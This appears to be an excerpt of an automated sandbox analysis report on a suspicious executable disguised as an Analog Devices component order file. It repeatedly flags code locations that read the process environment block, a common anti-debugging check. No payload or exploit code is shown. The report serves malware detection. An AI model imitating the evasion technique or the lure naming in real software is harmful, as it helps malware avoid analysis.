Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01700710 mov eax, dword ptr fs:[00000030h]	2_2_01700710
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01730710 mov eax, dword ptr fs:[00000030h]	2_2_01730710
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173C700 mov eax, dword ptr fs:[00000030h]	2_2_0173C700
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017047FB mov eax, dword ptr fs:[00000030h]	2_2_017047FB
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017047FB mov eax, dword ptr fs:[00000030h]	2_2_017047FB
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178E7E1 mov eax, dword ptr fs:[00000030h]	2_2_0178E7E1
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017227ED mov eax, dword ptr fs:[00000030h]	2_2_017227ED
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017227ED mov eax, dword ptr fs:[00000030h]	2_2_017227ED
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017227ED mov eax, dword ptr fs:[00000030h]	2_2_017227ED
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0170C7C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017807C3 mov eax, dword ptr fs:[00000030h]	2_2_017807C3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B47A0 mov eax, dword ptr fs:[00000030h]	2_2_017B47A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017007AF mov eax, dword ptr fs:[00000030h]	2_2_017007AF
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A678E mov eax, dword ptr fs:[00000030h]	2_2_017A678E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01732674 mov eax, dword ptr fs:[00000030h]	2_2_01732674
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C866E mov eax, dword ptr fs:[00000030h]	2_2_017C866E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C866E mov eax, dword ptr fs:[00000030h]	2_2_017C866E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173A660 mov eax, dword ptr fs:[00000030h]	2_2_0173A660
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173A660 mov eax, dword ptr fs:[00000030h]	2_2_0173A660
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171C640 mov eax, dword ptr fs:[00000030h]	2_2_0171C640
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01736620 mov eax, dword ptr fs:[00000030h]	2_2_01736620
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01738620 mov eax, dword ptr fs:[00000030h]	2_2_01738620
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171E627 mov eax, dword ptr fs:[00000030h]	2_2_0171E627
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170262C mov eax, dword ptr fs:[00000030h]	2_2_0170262C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742619 mov eax, dword ptr fs:[00000030h]	2_2_01742619
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171260B mov eax, dword ptr fs:[00000030h]	2_2_0171260B
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171260B mov eax, dword ptr fs:[00000030h]	2_2_0171260B
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171260B mov eax, dword ptr fs:[00000030h]	2_2_0171260B
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171260B mov eax, dword ptr fs:[00000030h]	2_2_0171260B
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171260B mov eax, dword ptr fs:[00000030h]	2_2_0171260B
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171260B mov eax, dword ptr fs:[00000030h]	2_2_0171260B
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171260B mov eax, dword ptr fs:[00000030h]	2_2_0171260B
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177E609 mov eax, dword ptr fs:[00000030h]	2_2_0177E609
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177E6F2 mov eax, dword ptr fs:[00000030h]	2_2_0177E6F2
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177E6F2 mov eax, dword ptr fs:[00000030h]	2_2_0177E6F2
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177E6F2 mov eax, dword ptr fs:[00000030h]	2_2_0177E6F2
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177E6F2 mov eax, dword ptr fs:[00000030h]	2_2_0177E6F2
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017806F1 mov eax, dword ptr fs:[00000030h]	2_2_017806F1
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017806F1 mov eax, dword ptr fs:[00000030h]	2_2_017806F1
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0173A6C7
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0173A6C7
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017366B0 mov eax, dword ptr fs:[00000030h]	2_2_017366B0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0173C6A6
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01704690 mov eax, dword ptr fs:[00000030h]	2_2_01704690
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01704690 mov eax, dword ptr fs:[00000030h]	2_2_01704690
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A4978 mov eax, dword ptr fs:[00000030h]	2_2_017A4978
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A4978 mov eax, dword ptr fs:[00000030h]	2_2_017A4978
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178C97C mov eax, dword ptr fs:[00000030h]	2_2_0178C97C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01726962 mov eax, dword ptr fs:[00000030h]	2_2_01726962
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01726962 mov eax, dword ptr fs:[00000030h]	2_2_01726962
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01726962 mov eax, dword ptr fs:[00000030h]	2_2_01726962
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0174096E mov eax, dword ptr fs:[00000030h]	2_2_0174096E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0174096E mov edx, dword ptr fs:[00000030h]	2_2_0174096E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0174096E mov eax, dword ptr fs:[00000030h]	2_2_0174096E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D4940 mov eax, dword ptr fs:[00000030h]	2_2_017D4940
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01780946 mov eax, dword ptr fs:[00000030h]	2_2_01780946
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178892A mov eax, dword ptr fs:[00000030h]	2_2_0178892A
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0179892B mov eax, dword ptr fs:[00000030h]	2_2_0179892B
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178C912 mov eax, dword ptr fs:[00000030h]	2_2_0178C912
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016F8918 mov eax, dword ptr fs:[00000030h]	2_2_016F8918
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016F8918 mov eax, dword ptr fs:[00000030h]	2_2_016F8918
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177E908 mov eax, dword ptr fs:[00000030h]	2_2_0177E908
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177E908 mov eax, dword ptr fs:[00000030h]	2_2_0177E908
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017329F9 mov eax, dword ptr fs:[00000030h]	2_2_017329F9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017329F9 mov eax, dword ptr fs:[00000030h]	2_2_017329F9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178E9E0 mov eax, dword ptr fs:[00000030h]	2_2_0178E9E0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0170A9D0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0170A9D0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0170A9D0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0170A9D0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0170A9D0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0170A9D0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017349D0 mov eax, dword ptr fs:[00000030h]	2_2_017349D0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CA9D3 mov eax, dword ptr fs:[00000030h]	2_2_017CA9D3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017969C0 mov eax, dword ptr fs:[00000030h]	2_2_017969C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017889B3 mov esi, dword ptr fs:[00000030h]	2_2_017889B3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017889B3 mov eax, dword ptr fs:[00000030h]	2_2_017889B3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017889B3 mov eax, dword ptr fs:[00000030h]	2_2_017889B3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]	2_2_017129A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]	2_2_017129A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]	2_2_017129A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]	2_2_017129A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]	2_2_017129A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]	2_2_017129A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]	2_2_017129A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]	2_2_017129A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]	2_2_017129A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]	2_2_017129A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]	2_2_017129A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]	2_2_017129A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]	2_2_017129A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017009AD mov eax, dword ptr fs:[00000030h]	2_2_017009AD
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017009AD mov eax, dword ptr fs:[00000030h]	2_2_017009AD
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01796870 mov eax, dword ptr fs:[00000030h]	2_2_01796870
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01796870 mov eax, dword ptr fs:[00000030h]	2_2_01796870
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178E872 mov eax, dword ptr fs:[00000030h]	2_2_0178E872
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178E872 mov eax, dword ptr fs:[00000030h]	2_2_0178E872
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01730854 mov eax, dword ptr fs:[00000030h]	2_2_01730854
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01704859 mov eax, dword ptr fs:[00000030h]	2_2_01704859
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01704859 mov eax, dword ptr fs:[00000030h]	2_2_01704859
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01712840 mov ecx, dword ptr fs:[00000030h]	2_2_01712840
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A483A mov eax, dword ptr fs:[00000030h]	2_2_017A483A
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A483A mov eax, dword ptr fs:[00000030h]	2_2_017A483A
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173A830 mov eax, dword ptr fs:[00000030h]	2_2_0173A830
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01722835 mov eax, dword ptr fs:[00000030h]	2_2_01722835
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01722835 mov eax, dword ptr fs:[00000030h]	2_2_01722835
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01722835 mov eax, dword ptr fs:[00000030h]	2_2_01722835
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01722835 mov ecx, dword ptr fs:[00000030h]	2_2_01722835
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01722835 mov eax, dword ptr fs:[00000030h]	2_2_01722835
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01722835 mov eax, dword ptr fs:[00000030h]	2_2_01722835
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178C810 mov eax, dword ptr fs:[00000030h]	2_2_0178C810
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0173C8F9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0173C8F9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CA8E4 mov eax, dword ptr fs:[00000030h]	2_2_017CA8E4
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0172E8C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D08C0 mov eax, dword ptr fs:[00000030h]	2_2_017D08C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178C89D mov eax, dword ptr fs:[00000030h]	2_2_0178C89D
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01700887 mov eax, dword ptr fs:[00000030h]	2_2_01700887
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016FCB7E mov eax, dword ptr fs:[00000030h]	2_2_016FCB7E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AEB50 mov eax, dword ptr fs:[00000030h]	2_2_017AEB50
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D2B57 mov eax, dword ptr fs:[00000030h]	2_2_017D2B57
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D2B57 mov eax, dword ptr fs:[00000030h]	2_2_017D2B57
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D2B57 mov eax, dword ptr fs:[00000030h]	2_2_017D2B57
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D2B57 mov eax, dword ptr fs:[00000030h]	2_2_017D2B57
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B4B4B mov eax, dword ptr fs:[00000030h]	2_2_017B4B4B
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B4B4B mov eax, dword ptr fs:[00000030h]	2_2_017B4B4B
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A8B42 mov eax, dword ptr fs:[00000030h]	2_2_017A8B42
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01796B40 mov eax, dword ptr fs:[00000030h]	2_2_01796B40
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01796B40 mov eax, dword ptr fs:[00000030h]	2_2_01796B40
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CAB40 mov eax, dword ptr fs:[00000030h]	2_2_017CAB40
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016F8B50 mov eax, dword ptr fs:[00000030h]	2_2_016F8B50
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172EB20 mov eax, dword ptr fs:[00000030h]	2_2_0172EB20
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172EB20 mov eax, dword ptr fs:[00000030h]	2_2_0172EB20
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C8B28 mov eax, dword ptr fs:[00000030h]	2_2_017C8B28
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C8B28 mov eax, dword ptr fs:[00000030h]	2_2_017C8B28
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]	2_2_0177EB1D
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]	2_2_0177EB1D
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]	2_2_0177EB1D
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]	2_2_0177EB1D
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]	2_2_0177EB1D
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]	2_2_0177EB1D
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]	2_2_0177EB1D
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]	2_2_0177EB1D
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]	2_2_0177EB1D
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D4B00 mov eax, dword ptr fs:[00000030h]	2_2_017D4B00
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01708BF0 mov eax, dword ptr fs:[00000030h]	2_2_01708BF0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01708BF0 mov eax, dword ptr fs:[00000030h]	2_2_01708BF0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01708BF0 mov eax, dword ptr fs:[00000030h]	2_2_01708BF0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178CBF0 mov eax, dword ptr fs:[00000030h]	2_2_0178CBF0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172EBFC mov eax, dword ptr fs:[00000030h]	2_2_0172EBFC
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AEBD0 mov eax, dword ptr fs:[00000030h]	2_2_017AEBD0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01720BCB mov eax, dword ptr fs:[00000030h]	2_2_01720BCB
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01720BCB mov eax, dword ptr fs:[00000030h]	2_2_01720BCB
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01720BCB mov eax, dword ptr fs:[00000030h]	2_2_01720BCB
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01700BCD mov eax, dword ptr fs:[00000030h]	2_2_01700BCD
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01700BCD mov eax, dword ptr fs:[00000030h]	2_2_01700BCD
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01700BCD mov eax, dword ptr fs:[00000030h]	2_2_01700BCD
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B4BB0 mov eax, dword ptr fs:[00000030h]	2_2_017B4BB0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B4BB0 mov eax, dword ptr fs:[00000030h]	2_2_017B4BB0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710BBE mov eax, dword ptr fs:[00000030h]	2_2_01710BBE
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710BBE mov eax, dword ptr fs:[00000030h]	2_2_01710BBE
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177CA72 mov eax, dword ptr fs:[00000030h]	2_2_0177CA72
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177CA72 mov eax, dword ptr fs:[00000030h]	2_2_0177CA72
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AEA60 mov eax, dword ptr fs:[00000030h]	2_2_017AEA60
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173CA6F mov eax, dword ptr fs:[00000030h]	2_2_0173CA6F
